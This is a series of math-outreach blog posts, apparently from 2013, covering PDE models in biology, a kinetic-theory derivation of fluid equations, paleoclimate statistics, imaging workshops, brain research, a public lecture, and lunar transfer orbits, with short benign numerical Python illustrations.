Benoit Perthame of the Université Pierre et Marie Curie, Paris VI, will talk about the role PDEs play in modeling neural networks. According to Perthame, “Neurons exchange information via discharges propagated by membrane potentials which trigger firing of the many connected neurons. How to describe large networks of such neurons? How can such a network generate a collective activity?” His talk will discuss how such questions can be tackled using nonlinear partial-integro-differential equations. Among this class of equations, the Wilson-Cowan equations describe brain spiking rates globally. Another classical model is the integrate-and-fire equation based on Fokker-Planck equations. Perthame will analyze these models and discuss synchronization phenomena.

Philip Maini of Oxford University will describe a completely different set of biological phenomena that are modeled by PDEs. He will describe “three different examples of collective cell movement which require different modeling approaches: movement of cells in epithelial sheets, with application to rosette formation in the mouse epidermis and monoclonal conversion in intestinal crypts; cranial neural crest cell migration which requires a hybrid discrete cell-based chemotaxis model; acid-mediated cancer cell invasion, modeled via a coupled system of nonlinear partial differential equations.” All these models can be expressed in the framework of nonlinear diffusion equations, which can be used to understand a range of biological phenomena.

Mathematics is playing an increasingly important role in the understanding and analysis of biological phenomena.

Posted in Biology, Conference Announcement, Mathematics | Leave a comment

Deriving the Navier-Stokes Equations from Molecular Dynamics: A Case Study for Dimension Reduction

In today’s blog, I will go into one of the issues in mathematical ecology mentioned in yesterday’s blog reporting on the MBI workshop on “Sustainability and Complex Systems.” The issue came up in the discussion sessions, where the question was asked how one could apply dimension-reduction techniques to individual-based models (IBMs) and derive more manageable descriptions of ecological systems.

The discussion at the workshop reminded me of my earlier interest in gas dynamics, where a similar issue arises: How to derive continuum models like the Navier-Stokes equations from the equations of motion of the individual molecules that make up the gas. This issue is one of the main topics of investigation in kinetic theory; it has a long history going back to Ludwig Boltzmann in the 1870s. While the initial discussions were mostly heuristic, mathematical research in the latter part of the 20th century has provided a rigorous framework for the various approximations, so today the theory is on a more or less solid foundation.

In kinetic theory, a gas is thought of as a collection of mutually interacting molecules, possibly moving under the influence of external forces. We assume for simplicity that the molecules are all of the same kind (a “simple gas”) and that there are no external forces acting on the molecules. Each molecule moves in physical space; at each instant $t$, its state is described by its position vector $x$ and its velocity vector $c$. Molecules interact, they may attract or repel each other, and as they interact their velocities change. The interactions are assumed to be local and instantaneous and derived from some potential (for example, the Lennard-Jones potential). If the interaction is elastic, then mass, momentum, and kinetic energy are preserved, so the velocities of two interacting molecules are determined uniquely in terms of their velocities before the interaction.

At the microscopic level, the state of a gas comprising $N$ molecules is described by an $N$-particle distribution function $f_N$ with values $f_N (\mathbf{x}_1, \dots, \mathbf{x}_N, \mathbf{c}_1, \dots, \mathbf{c}_N, t)$. This function evolves in a $6N$-dimensional space according to the Liouville equation,
$$
\frac{\partial f_N}{\partial t} + \sum_{i=1}^N (\nabla_{\mathbf{x}_i} f_N) \cdot \dot{\mathbf{x}}_i + \sum_{i=1}^N (\nabla_{\mathbf{c}_i} f_N) \cdot \mathbf{F}_i = 0 ,
\quad \mathbf{F}_i = -\sum_{j=1}^N \nabla_{\mathbf{x}_i} \Phi_{ij} .
$$
Note that the Liouville equation is linear in $f_N$.

By integration over part of the variables, the Liouville equation is transformed into a chain of $N$ equations where the first equation connects the evolution of the one-particle distribution function with the two-particle distribution function, the second equation connects the two-particle distribution function with the three-particle distribution function, and generally the $s$th equation connects the $s$-particle distribution function $f_s$ with the $(s+1)$-particle distribution function $f_{s+1}$,
$$
\frac{\partial f_s}{\partial t} + \sum_{i=1}^s (\nabla_{\mathbf{x}_i} f_s) \cdot \dot{\mathbf{x}}_i + \sum_{i=1}^s (\nabla_{\mathbf{c}_i} f_s) \cdot \mathbf{F}_i = -\sum_{i=1}^s \nabla_{\mathbf{c}_i} \cdot \int (\nabla_{\mathbf{x}_i} \Phi_{i, s+1}) f_{s+1} \, d\mathbf{x}_{s+1} \, d\mathbf{c}_{s+1} .
$$
This is the so-called BBGKY hierarchy (named after its developers, Bogoliubov, Born, Green, Kirkwood and Yvon), which is a description of a gas at the microscopic level. The equations in the hierarchy define a linear operator in the space of chains of length $N$ of density functions.

From the BBGKY hierarchy one obtains a description at the mesoscopic level by taking the equation for the one-particle distribution function and employing a closure relation to express the two-particle distribution function as the product of two one-particle distribution functions. This is the (in)famous “Stosszahlansatz,” which leads to the Boltzmann equation—an integrodifferential equation for the one-particle distribution function $f_1$ (which we denote henceforth simply by $f$, with values $f(\mathbf{x}, \mathbf{c}, t)$) with a quadratic nonlinearity on the right-hand side,
$$
\frac{\partial f}{\partial t} + (\nabla_{\mathbf{x}} f) \cdot \dot{\mathbf{x}} + (\nabla_{\mathbf{c}} f) \cdot \mathbf{F} = \int \int (f'_1 f'_2 - f_1 f_2) k_{12} \, dk \, d\mathbf{c}_2 ,
$$
where $f'_1$ and $f'_2$ denote the values of $f$ at the velocity variables $\mathbf{c}'_1$ and $\mathbf{c}'_2$ before the interaction and $f_1$ and $f_2$ the same at the velocity variables $\mathbf{c}_1$ and $\mathbf{c}_2$ after the interaction. The kernel $k_{12}$ represents the change in direction of the relative velocity of the two molecules as a result of their interaction. The step from the BBGKY hierarchy to the Boltzmann equation introduces not only a nonlinearity, it also introduces irreversibility: the Boltzmann equation is time-irreversible (Boltzmann’s H-Theorem).

When mass, momentum and internal energy are preserved in a molecular interaction, a further reduction is possible. The macroscopic variables of the gas are the mass density $\rho$, the hydrodynamic velocity $\mathbf{v}$, and the temperature $T$ (which is a measure of the internal energy). They are the velocity moments of $f$ with respect to mass, momentum and internal energy. Multiplying both sides of the Boltzmann equation with the molecular mass and integrating over all velocities, we obtain the continuity equation,
$$
\frac{\partial \rho}{\partial t} + \nabla \cdot (\rho \mathbf{v}) = 0 .
$$
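As a small numerical aside (my own illustration, not part of the kinetic-theory derivation), one can check that the macroscopic variables really are velocity moments of $f$: for an assumed one-dimensional Maxwellian, simple quadrature recovers the density, bulk velocity, and temperature.

```python
# Moments of a one-dimensional Maxwellian (units with molecular mass = k_B = 1).
import numpy as np

rho, v, T = 1.2, 0.3, 2.0                 # assumed macroscopic state
c = np.linspace(-30.0, 30.0, 20001)       # velocity grid
dc = c[1] - c[0]
f = rho / np.sqrt(2 * np.pi * T) * np.exp(-(c - v) ** 2 / (2 * T))

rho_num = np.sum(f) * dc                              # zeroth moment: density
v_num = np.sum(c * f) * dc / rho_num                  # first moment: bulk velocity
T_num = np.sum((c - v_num) ** 2 * f) * dc / rho_num   # second central moment
print(rho_num, v_num, T_num)              # approximately (1.2, 0.3, 2.0)
```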
Multiplying both sides of the Boltzmann equation with the momentum vector and integrating over all velocities, we obtain the equation of motion,
$$
\frac{\partial (\rho \mathbf{v} )}{\partial t} + \nabla \cdot (\rho \mathbf{v} \mathbf{v}) - \nabla \cdot \mathbb{T} = 0 ,
$$
where $\mathbb{T}$ is the Cauchy stress tensor.

If the gas is in hydrostatic equilibrium, the Cauchy stress tensor is diagonal, the shear stresses are zero, and the normal stresses are all equal. The hydrostatic pressure $p$ is the negative of the normal stresses, so $\mathbb{T} = -p\,\mathbb{I}$. The equation of motion reduces to
$$
\frac{\partial (\rho \mathbf{v})}{\partial t} + \nabla \cdot (\rho \mathbf{v} \mathbf{v}) + \nabla p = 0 .
$$
This is the Navier-Stokes equation of fluid dynamics, which describes the evolution of the gas at the macroscopic level.

The procedure outlined above to derive the Navier-Stokes equation from the Boltzmann equation is known as the Chapman-Enskog procedure. It is essentially an asymptotic analysis based on a two-time scale singular perturbation expansion, where the macroscopic variables evolve on the slow time scale and the one-particle distribution function on the fast time scale.

Thus, there exists a very systematic procedure to get from the microscopic level (the Liouville equation and the BBGKY hierarchy) to the mesoscopic level (the Boltzmann equation) and from there to the macroscopic level (the Navier-Stokes equation). Given that the IBMs are the analog in ecology of the Liouville equation in gas dynamics, I suspect that there is a similar procedure to reduce the IBMs to more manageable equations at the macroscopic level. Food for thought.

References:

Joseph O. Hirschfelder, Charles Francis Curtiss, Robert Byron Bird, Molecular theory of gases and liquids, Wiley, 1954

J. H. Ferziger and H. G. Kaper, Mathematical Theory of Transport Processes in Gases, North-Holland Publ. Co., Amsterdam, 1972

Sydney Chapman, T. G. Cowling and C. Cercignani, The Mathematical Theory of Non-uniform Gases: An Account of the Kinetic Theory of Viscosity, Thermal Conduction and Diffusion in Gases, Cambridge Mathematical Library, 1991

Posted in Dimension Reduction, Ecology, Mathematics | Leave a comment

MBI Workshop “Sustainability and Complex Systems”

During the week of September 16-20, 2013, I attended a workshop on “Sustainability and Complex Systems” at the Mathematical Biosciences Institute at Ohio State. This was the first of three workshops on the theme “Ecosystem Dynamics and Management,” organized under the umbrella of MPE2013.

The workshop was organized by Chris Cosner (Dept of Mathematics, U Miami), Volker Grimm (Helmholtz Centre for Environmental Research, Leipzig, Germany), Alan Hastings (Department of Environmental Science and Policy, UC Davis), and Otso Ovaskainen (Dept of Biosciences, U Helsinki, Finland) and was attended by some 40 researchers from a variety of disciplines, including biology, ecology, environmental science, marine science, public policy, mathematics, and statistics.

In their abstract for the workshop, the organizers wrote: “Creating mathematical models for the sustainability of ecosystems poses many mathematical challenges. Ecosystems are complex because they involve multiple interactions among organisms and between organisms and the physical environment, at multiple scales both in time and in space, with feedback loops making connections across scales.” The workshop program reflected this wide range of challenges. The talks covered anything from conceptual dynamical-systems models to highly detailed individual- or agent-based models (IBMs). During the workshop, there was ample opportunity to discuss the issues, and a display of topical posters highlighted specific case studies in more detail.

The titles of the talks give an idea of the variety of topics covered at the workshop:

  • Aquaculture and Sustainability of Coastal Ecosystems (Mark Lewis)
  • Modeling socio-economic aspects of ecosystem management and biodiversity conservation (Yoh Iwasa)
  • Individual-based Ecology (Volker Grimm)
  • Sustainability of agroecosystems: insights from the multiscale insect pest monitoring (Sergei Petrovskii)
  • A network-patch modeling framework for the transmission of vector-borne infections (Mac Hyman)
  • A trait-based perspective of complex systems (Priyanga Amarasekare)
  • Stochasticity in complex systems (Karen Abbott)
  • Tipping points beyond bifurcations (Sebastian Wieczorek)
  • Challenges in Modeling Biological Invasions and Population Distributions in a Changing Climate (Chris Cosner)
  • Role of time scales in sustainability of complex systems (Alan Hastings)
  • Coarse-graining computations for complex systems (Yannis Kevrekidis)
  • Tipping Points in Contagion Models (Carl Simon)
  • Beyond the proof of concept: virtual ecologists in complex dynamic systems (Damaris Zurell)
  • Models and data: from individuals to populations (Otso Ovaskainen)

Various discussion groups addressed issues of current interest in the ecology community. These groups were formed on an ad-hoc basis and met several times during the workshop. The workshop participants were encouraged to rotate among the groups, to promote diversity of viewpoints. Summaries of the discussions were presented in plenary sessions. Here are some headlines that were discussed:

  • Can IBMs fill in gaps when experiments are not feasible?
  • How to incorporate stochasticity in IBMs and how to assess the results?
  • How to couple evolution, ecology and heterogeneity and get a tractable model?
  • Mathematical methods for dimension reduction;
  • Construction of ecological models in the presence of uncertainty and tools for management under uncertainty;
  • Human factors;
  • Established concepts for the analysis of complex systems.

Other workshops in the Fall 2013 program on “Ecosystem Dynamics and Management” are devoted to “Rapid Evolution and Sustainability” (October 7-11) and “Sustainable Management of Living Natural Resources” (November 4-8).

Posted in Complex Systems, Ecology, Workshop Report | Leave a comment

Understanding Earth’s Past Climate: How the Mathematical Sciences Can Help to Inform the Debate on Climate Change

Some of the fundamental questions about the Earth’s climate are only partially addressed: What is the relationship between temperature measurements and greenhouse gas emissions, and what does this relationship tell us about the sensitivity of climate to increased greenhouse gas concentrations? How can historical temperature measurements inform this understanding? To what extent are temperatures during the last few decades anomalous in a millennial context? What is the link between tropical cyclone intensity and ocean warming?

To answer these questions accurately, data that is reliable, continuous, and of broad spatial coverage is required. It is well known that direct physical measurements of climate fields (such as temperature) are limited both temporally and spatially, with measurement quality and availability sharply decreasing as one goes further back in time. Unfortunately, measurements of land and sea surface temperature fields cover only the post-1850 period (often referred to as the instrumental period), with large regions afflicted by missing data, measurement errors, and changes in observational practices. Hence, hemispheric temperatures during the past millennium can only be inferred indirectly by using temperature-sensitive geological proxy data such as tree rings, ice cores, corals, speleothems (cave formations), and lake sediments. These temperature-sensitive geological proxy data act as nature’s thermometers and thus contain valuable information about past climates; see Guillot, Rajaratnam and Emile-Geay (2013), Janson and Rajaratnam (2013), and other literature for more details on this topic.

The reconstruction of past climates using proxy data is basically a statistical problem which requires tools from various branches of the mathematical sciences. More concretely, the statistical paleoclimate reconstruction problem involves (1) extracting the relationship between temperature and temperature-sensitive geological proxy data, (2) using this relationship to backcast (or hindcast) past temperature, and (3) quantifying the uncertainty that is implicit in such paleoclimate reconstructions, i.e., making probabilistic assessments about past climate.
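As a toy illustration of steps (1) and (2), and emphatically not the methodology of the papers cited below, one can calibrate a regularized (ridge) linear relation between synthetic proxies and temperature over a short “instrumental” period and then hindcast temperature where only proxies are available:

```python
# Synthetic calibrate-and-hindcast sketch with a ridge (Tikhonov) regression.
import numpy as np

rng = np.random.default_rng(0)
n_cal, n_past, p = 150, 500, 20            # calibration years, past years, proxies

T_true = np.sin(np.linspace(0, 20, n_cal + n_past))       # synthetic "climate"
W = rng.normal(size=p)                                     # proxy sensitivities
X = np.outer(T_true, W) + 0.3 * rng.normal(size=(n_cal + n_past, p))  # proxies

X_cal, T_cal = X[-n_cal:], T_true[-n_cal:]   # temperatures observed only recently

lam = 1.0                                    # regularization strength
beta = np.linalg.solve(X_cal.T @ X_cal + lam * np.eye(p), X_cal.T @ T_cal)

T_hindcast = X[:n_past] @ beta               # step (2): backcast past temperature
print(np.corrcoef(T_hindcast, T_true[:n_past])[0, 1])
```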

The problem is exacerbated by several methodological and practical issues:

  • Data: Proxy data is not available everywhere on the globe and decreases sharply back in time.
  • Data: Instrumental temperature data is limited, both spatially and temporally.
  • Methodology: The high-dimensional nature of the reconstruction problem stems from the fact that the number of time points available for regressing temperature on proxies is very limited. Hence, standard statistical methods such as ordinary least squares regression do not readily apply.
  • Methodology: There is temporal and spatial correlation in both proxy and temperature data.
  • Methodology: The traditional assumption of normally distributed errors is often unrealistic due to outliers in the data.

The nonstandard settings under which paleoclimate reconstructions have to be undertaken lead to a variety of statistical problems with important and deep questions in applied and computational mathematics and also in pure mathematics.

First, given the ill-posed nature of the regression problem, it is not clear which high-dimensional regression methodology or type of regularization (like Tikhonov regularization) is applicable. Second, the need to model a spatial random field requires specifying probabilistic models for understanding the correlation structure of temperature points and proxies in both space and time. Even a coarse 5-by-5 latitude/longitude gridded field on the Earth leads to more than 2000 spatial points. Specifying covariance matrices of this order requires estimating about 2 million parameters—which is a non-starter given the fact that only 150 years of data is available. Hence, sparse covariance modeling is naturally embedded in the statistical paleoclimate reconstruction problem. Estimating covariance matrices in an accurate but sparse way leads to important questions in convex optimization. Regularization methods for inducing sparsity in covariance matrices lead to the problem of characterizing maps which leave the cone invariant. Such questions have actually been considered in a more classical setting in the work of Rudin and Schoenberg. They are, however, not directly applicable to the paleoclimate reconstruction problem and require further generalizations and extensions.
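To give the flavor of one such regularization route, here is a minimal sketch of sparse covariance estimation by hard thresholding of the sample covariance; the threshold and the data are generic stand-ins, not the estimator developed in the references below:

```python
# Hard-thresholded sample covariance: few samples (years), many grid points.
import numpy as np

rng = np.random.default_rng(1)
n_years, n_grid = 150, 2000
X = rng.normal(size=(n_years, n_grid))     # stand-in for gridded anomalies

S = np.cov(X, rowvar=False)                # raw sample covariance (noisy)
tau = 2 * np.sqrt(np.log(n_grid) / n_years)    # a standard theoretical threshold
S_sparse = np.where(np.abs(S) >= tau, S, 0.0)  # keep only sizeable entries
np.fill_diagonal(S_sparse, np.diag(S))         # never threshold the variances
print(np.mean(S_sparse != 0))              # fraction of retained entries
```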

These are just a few examples where pure mathematics, statistics, applied and computational mathematics are essential tools in current techniques that are used for understanding Earth’s past climate. The need to develop rigorous mathematical and statistical tools is thus critical for such contemporary earth science endeavors.

References:

Guillot, D., B. Rajaratnam, and J. Emile-Geay (2013), Statistical Paleoclimate Reconstructions via Markov Random Fields, Technical Report, Department of Statistics, Stanford University; arXiv:1309.6702 [stat.AP]

Janson, L. and Rajaratnam, B. (2013), A Methodology for Robust Multiproxy Paleoclimate Reconstructions and Modeling of Temperature Conditional Quantiles, Journal of the American Statistical Association (in print); arXiv:1308.5736 [stat.ME]

Bala Rajaratnam
Department of Statistics and Environmental Earth System Science
Institute for Computational and Mathematical Engineering
The Woods Institute for the Environment
Stanford University

Posted in Paleoclimate, Statistics | Leave a comment

Modeling the Evolution of Ancient Societies

Another mathematical modeling success is highlighted in a September 23, 2013, Science News story that describes the evolution of ancient complex societies. One interesting fact reported is that intense warfare is the evolutionary driver of complex societies. The findings accurately match the historical records. The study was done by a trans-disciplinary team at the University of Connecticut, the University of Exeter, and NIMBioS and is available as an open access article in the Proceedings of the National Academy of Sciences. To see a simulation try this, and for more information see the press release.

Estelle Basor
American Institute of Mathematics

Posted in Social Systems | Leave a comment

Frontiers in Imaging, Mathematics, and the Life Sciences

As society increasingly benefits from the various types and uses of imaging, there is a growing need to integrate imaging data across modalities and to develop new imaging techniques. Not surprisingly, the mathematical sciences—mathematics, statistics, and computational science—all play a role in this growing area.

As part of the effort to address the challenges in this area, NSF’s Mathematical Biosciences Institute (MBI) at Ohio State University is hosting four spring semester workshops aimed at the interface of imaging, mathematics, and the life sciences. This one-semester program will bring together researchers from mathematics, imaging technology, biology, and the life sciences to explore new ways to bridge these diverse disciplines and to facilitate further usage of mathematics for key problems in imaging, medicine, and the life sciences in general. People interested in attending are welcome to apply here.

  • Visualizing and Modeling Cellular and Sub-Cellular Phenomena (January 13-17, 2014)

    The frontier of biology and medicine is defined by our ability to decipher the mechanisms that underlie basic phenomena. These phenomena may include cell motility and migration, cell division, cell reprogramming, and cell communication that may be manifested in a wide range of questions in development and disease. Thus, examples from stem cell, developmental, neural, and cancer biology have the potential to allow examination of basic biological processes within the context of real, in vivo phenomena. However, a major challenge has been the lack of a means to identify biologically tractable problems and link these problems to applications-oriented experts from imaging and mathematics.

    The rate at which this frontier advances depends, at least in part, on how fast technology evolves and on how data is interpreted and translated into a better understanding of basic mechanisms. In the past 10 years, dramatic advances in imaging technology and mathematics have provided new tools and models for discovery that have enabled new observations and hypotheses to be tested. These tools, which are often designed for general applications, find their way into the hands of biologists who then see ways to use them. In some cases, specific mathematical models and applications drive innovations. The mathematical methods involved include PDEs, moving boundary value problems, dynamic geometric changes, optimal transport, stochastic modeling, and the analysis of large data sets. Advances in imaging technology that will be discussed include serial block-face scanning electron microscopy, superresolution microscopy, fluorescence resonance energy transfer (FRET)-based activity biosensors, detection of forces in cells and tissue, multispectral and multiphoton deep tissue imaging, and fluorescence light-sheet microscopy.

    The goal of this workshop is to encourage biologists to describe tough questions and to jointly think about approaches that inspire new developments and interdisciplinary research collaborations. We plan to do this by combining input and discussion from experts in imaging technology and mathematics with cell, developmental and cancer biologists that share a passion for solving the riddles that underlie complex phenomena in dynamic living systems. We suggest that both groups of participants blend what is technically possible with what exists only in dream space, with the hope that together we will learn something new and be stimulated to explore new ways to visualize, model and better understand complex processes.

  • Morphogenesis, Regeneration, and the Analysis of Shape (February 10-14, 2014)

    This workshop addresses the broad class of imaging problems in the life sciences that rely on shape or geometry to characterize biological processes and parameters. Of course, the strategy of observing shape and its relationships to biology is a classical undertaking, but in recent years, the availability of 3D imaging and better computational tools has opened up new possibilities for systematic, quantitative analyses of biological shape. This, in turn, has resulted in new demands for more fundamental approaches, based in mathematics, for quantifying and analyzing geometric objects. The problem of quantifying shapes arises in clinical science, where the shapes of neurological or musculoskeletal structures are thought to be related to growth, function, pathology, and degeneration. More recently, computational strategies for shape analysis have become widespread throughout the life sciences, with compelling applications in anthropology, cell and tissue biology, botany, etc.

    The mathematical contributions to shape analysis have resulted in new tools for modeling or characterizing shapes and for analyzing both shape dynamics and the statistics of populations of shapes. However, the applications of these methods are typically limited by somewhat strong assumptions about the classes of shapes, such as smoothness, correspondence, and homogeneity or underlying simplifications in morphogenetic processes. This workshop focuses on the frontiers of this technology with an eye toward new applications, such as cell biology and biological morphogenesis, which have yet to benefit from robust, comprehensive approaches. Of particular interest are more general tools for handling nonmanifold shapes, such as networks or trees, as well as tools that can handle relatively heterogeneous collections of objects, such as those seen in cell or tissue biology. Also important is the analysis of dynamic shapes as in morphogenesis and regeneration, and the links to other data such as lineage, genomics, and proteomics. Participants will consist of life scientists with compelling scientific and clinical examples, engineers with computational tools for shape analysis, and mathematicians with insights into fundamental approaches for representing and quantifying shape.

  • Integrating Modalities and Scales in Life Science Imaging (March 17-21, 2014)

    Merging imaging modalities is increasingly important for biomedical questions related to time and space scales including function and anatomy. Integrating modalities from multiple scales can assist with understanding development and function, disease, diagnosis and treatment. This workshop will bring together researchers who are attempting to combine and integrate different imaging modalities to better understand anatomy, function and disease from the cellular to organ level.

    Methodologies and challenges in combining imaging data from multiple sources, such as MRI, fMRI, DTI, PET, EEG, MEG, CT, ultrasound, NMR, x-ray diffraction, electron microscopy, proteomic and genomic data, will be explored. Merging data from different modality time scales (functional time scales from nanoseconds to minutes; developmental time scales from embryonic to adult) and space scales (from microns to millimeters) presents many mathematical questions. Interpretation, analysis and modeling of multi-modality data as it applies to development, disease models and therapies will also be explored. The heterogeneity of the data presents many difficult challenges that are suited for mathematical exploration.

    The focus will include brain and cardiac imaging related to multiscale and bioscale data collection, merging data, modeling and analysis. This workshop will be of interest to mathematicians working in areas of statistical analysis, PDE modeling, inverse problems, differential geometry, computational visualization and multiscale problems. Biomedical researchers interested in merging imaging modalities to investigate questions related to genomics, gene expression and biomarkers and the role they play in macroscopic function would benefit from this workshop.

  • Analysis and Visualization of Large Collections of Imaging Data (April 21-25, 2014)

    This workshop focuses on the challenges presented by the analysis and visualization of large data sets that are collected in biomedical imaging, genomics and proteomics. The sheer size of data (easily in the range of terabytes, and growing) requires computationally efficient techniques for the sampling, representation, organization, and filtering of data; ideas and techniques from signal processing, geometric and topological analysis, stochastic dynamical systems, machine learning and statistical modeling are needed to extract patterns and characterize features of interest. Visualization enables interaction with data, algorithms, and outputs.

    Data sets from biomedical imaging, genomics and proteomics often have unique characteristics that differentiate them from other data sets, such as extremely high-dimensionality, high heterogeneity due to different data modalities (across different spatial and temporal scales, but also across different biological layers) that need to be fused, large stochastic components and noise, low sample size and possibly low reproducibility of per-patient data. These unique aspects, as well as the large size, pose challenges to many existing techniques aimed at solving the problems above.

    The workshop will bring together biologists, computer scientists, engineers, mathematicians and statisticians working in a wide range of areas of expertise, with the goal of pushing existing techniques, and developing novel ones, to tackle the unique challenges posed by large data sets in biomedical imaging.

    Posted in Imaging, Workshop Announcement | Leave a comment

    Brain Research through Advancing Innovative Neurotechnologies (BRAIN)

    Earlier this year, President Obama announced a major federal research initiative dubbed the “brain initiative.” According to the initial announcement, its goal was to develop and use imaging techniques to better understand neural processes and brain function.

    Recently, the U.S. National Institutes of Health provided more details on a possible program in Brain Research through Advancing Innovative Neurotechnologies (BRAIN). Plans are for this initiative to begin in 2014 (the 2014 fiscal year starts October 1, 2013). The report lists various research priorities; among these, according to Science (Vol. 341, page 1325, 20 September 2013) are “classifying brain cells, studying how they connect, and identifying how patterns of activity among them produce behavior.”

    Mathematics can play a crucial role in this research. Mathematicians Jennifer Chayes and Nancy Kopell were among the “expert consultants” in the study that led to the report (Report, pages 56-57).

    To get a sense of the role mathematics can play, one need only look at the research of Nancy Kopell, one of many people studying neural activity from a dynamical systems perspective. Kopell studies rhythmic behavior in networks of neurons—what biophysical mechanisms produce these rhythms, and what functions they serve. Kopell delivered SIAM’s 2007 John von Neumann Lecture. A March 2007 article on Kopell in SIAM News describes some of this research. An earlier SIAM News article from May 2003, by Dana Mackenzie, also described possible implications of this research for understanding brain-related diseases, such as Parkinson’s disease.

    Studying patterns of behavior through the dynamic interactions of neurons remains a very active area of research among mathematicians in the field of applied dynamical systems.

    Posted in Biology, Dynamical Systems, Patterns | Leave a comment

    Simons Public Lecture by Professor L. Mahadevan

    On September 24, 2013, I had the pleasure of attending the seventh in the nine-lecture MPE2013 Simons Public Lecture Series. The talk was held on the beautiful campus of Brown University in Providence, Rhode Island, and was attended by nearly 600 people, including entire bus-loads of high-school students.

    The hosting institution for this talk was the Institute for Computational and Experimental Research in Mathematics (ICERM). The crowd was welcomed by ICERM director Jill Pipher; Peter Jones, Director of the Applied Mathematics Program at Yale University, introduced the keynote speaker of the event, Professor L. Mahadevan of Harvard University. Professor Mahadevan’s research interests revolve around understanding the physical and biological organization of matter and how it is shaped, moves and flows, particularly at the scale of the everyday world. He uses both quantitative experiments and theoretical studies to probe questions over a range of scales.

    Professor Mahadevan’s talk was entitled “On Growth and Form: Mathematics, Physics and Biology,” after the book “On Growth and Form” by D’Arcy Wentworth Thompson. In his talk, Professor Mahadevan explored how issues of form are at their core mathematical problems. He explained how pollen tubes grow, leaves ripple, flowers bloom and guts loop. He gave very engaging examples of each, using visual aids and a series of slides to explain how mathematics is used to help solve ongoing questions of growth and form.

    Public Lecture - Prof. L. Mahadevan

    The lecture was followed by a reception for 50 special guests at the home of Brown University President Christine Paxson.

    The Brown Daily Herald reported on the lecture in an article entitled “Lecturer explains nature with mathematical principles,” by Staff Writer Alex Constantino, in its issue of September 25, 2013.

    Sponsored by the Simons Foundation, the MPE2013 Simons Public Lecture Series is taking place at nine locations around the world. Each lecturer is a leading expert who will explain how the mathematical sciences play a significant role in understanding and solving some of Planet Earth’s important problems. Our communities’ best expositors and champions will cover a diverse range of topics in lectures aimed at a public audience. Previous talks have been held in Melbourne, San Francisco, Cape Town, Montreal, Chapel Hill and Berlin. The remaining two talks will be held in Minneapolis on October 8 (“The Evolution of Cooperation: Why We Need Each Other to Succeed,” by Martin Nowak) and in Los Angeles (“Quantum Mechanics and the Future of the Planet,” by Emily Carter).

    Christine Marshall
    Program Manager
    Mathematical Sciences Research Institute
    17 Gauss Way
    Berkeley, CA 94720
    Tel. (510) 642-0555

    Posted in Public Event | Leave a comment

    New Ways to the Moon, Origin of the Moon, and Origin of Life on Earth

    The field of celestial mechanics is an old one, going back to 90 AD when Claudius Ptolemy sought to describe the motions of the planets. However, the modern field of celestial mechanics goes back to the 1700s when Joseph-Louis Lagrange studied the celebrated three-body problem for the motion of three mass points under the influence of the force of gravity. Henri Poincaré in the late 19th and early 20th century made huge advances in our understanding of the three-body problem, with new methods employing what we call today dynamical systems theory. Much of his work was focused on a special version of the three-body problem, namely the planar circular restricted three-body problem, where two mass points move in circular orbits about their common center of mass, in a plane, while a third point of zero mass moves in the same plane under the influence of the gravity of the two mass points. One can imagine these two bodies to be the Earth and the Moon, while the zero mass point can be a rock, for example a meteorite. Poincaré’s work indicated that the motion of the zero mass point could be very complex and very sensitive, so much so that it would be chaotic.

    If one considers the motion of a small object, say a spacecraft that is going to the Moon, under the gravitational influence of both the Earth and the Moon, then a standard route to the Moon from the Earth is called a Hohmann transfer, after the work of the engineer Walter Hohmann in the 1920s. This yields a flight time of about 3 days. The path is not chaotic since the spacecraft is going fairly fast; in fact, it looks almost linear. When a spacecraft approaches the Moon on this transfer, it needs to slow down a lot, by about 1 kilometer per second, in order to be captured into lunar orbit. This requires a lot of fuel, which is very expensive—about a million dollars per pound!
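
    As a rough check on these figures, the vis-viva equation, v = sqrt(mu (2/r - 1/a)), gives the speeds involved in an idealized two-body Hohmann transfer. The sketch below is a back-of-the-envelope calculation under assumed values (a 300 km circular parking orbit and standard Earth and Moon parameters); it is illustrative only, not mission analysis.

      import math

      mu_earth = 398600.0        # km^3/s^2, Earth's gravitational parameter
      r_leo = 6378.0 + 300.0     # km, assumed 300 km circular parking orbit (illustrative)
      r_moon = 384400.0          # km, mean Earth-Moon distance

      a_transfer = 0.5 * (r_leo + r_moon)   # semi-major axis of the transfer ellipse

      def vis_viva(r, a):
          """Orbital speed at radius r on an orbit with semi-major axis a (vis-viva equation)."""
          return math.sqrt(mu_earth * (2.0 / r - 1.0 / a))

      v_circle = vis_viva(r_leo, r_leo)          # circular speed in the parking orbit
      v_perigee = vis_viva(r_leo, a_transfer)    # speed at perigee of the transfer ellipse
      v_apogee = vis_viva(r_moon, a_transfer)    # speed at apogee (lunar distance)
      v_moon = vis_viva(r_moon, r_moon)          # Moon's orbital speed (circular approximation)

      dv_departure = v_perigee - v_circle        # trans-lunar injection burn
      v_rel_moon = v_moon - v_apogee             # arrival speed relative to the Moon
      t_days = math.pi * math.sqrt(a_transfer**3 / mu_earth) / 86400.0   # half-ellipse coast time

      print(f"departure burn ~ {dv_departure:.2f} km/s")
      print(f"arrival speed relative to the Moon ~ {v_rel_moon:.2f} km/s")
      print(f"coast time ~ {t_days:.1f} days")

    With these assumptions the departure burn comes out to about 3.1 km/s, the arrival speed relative to the Moon is of the same order as the roughly 1 kilometer per second that must be shed for capture, and the idealized half-ellipse coast takes about five days; practical lunar trajectories trade a somewhat larger burn for the shorter flight time quoted above.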

    Is there a better way? Is there a way to find a transfer to the Moon that is captured into lunar orbit automatically, without the use of rocket engines? The answer was not known until 1986, when the writer of this article (Edward Belbruno) found a way to do it. His 1987 paper was the first to demonstrate the process of ballistic capture—a transfer from the Earth that took 2 years to reach the Moon and resulted in automatic capture. In fact, the author showed that the region about the Moon where this capture can occur is one where the spacecraft must arrive slowly enough relative to the Moon. Then the balance of the gravitational tugs of the Earth and the Moon on the moving spacecraft causes the motion of the captured spacecraft to be chaotic. This region is today called the weak stability boundary.

